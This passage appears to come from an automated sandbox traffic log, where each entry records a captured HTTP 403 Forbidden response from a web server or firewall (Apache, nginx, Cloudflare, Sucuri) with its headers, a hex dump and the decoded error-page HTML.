6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:51 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:51 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:51 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hYibTg2hX6Fxp%2BhNHUKIIAhEF8bHIdGbJwgTFiTOyYcpI4894gjK5MhBdVlkIGa4LQehKY4RqyPgdu4YuiD9INpiP3K4F11kK7oG6bL%2FPOX0JBopVNGilcVmt%2FtC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a78b3b1e9a0f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 32 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f Data Ascii: 1c27<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:55:51 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66818F27:C471_D5BA2110:0050_640AD477_1112F:2EAE6x-iplb-instance: 28105Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:52 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:52 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:52 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:53 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:55:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 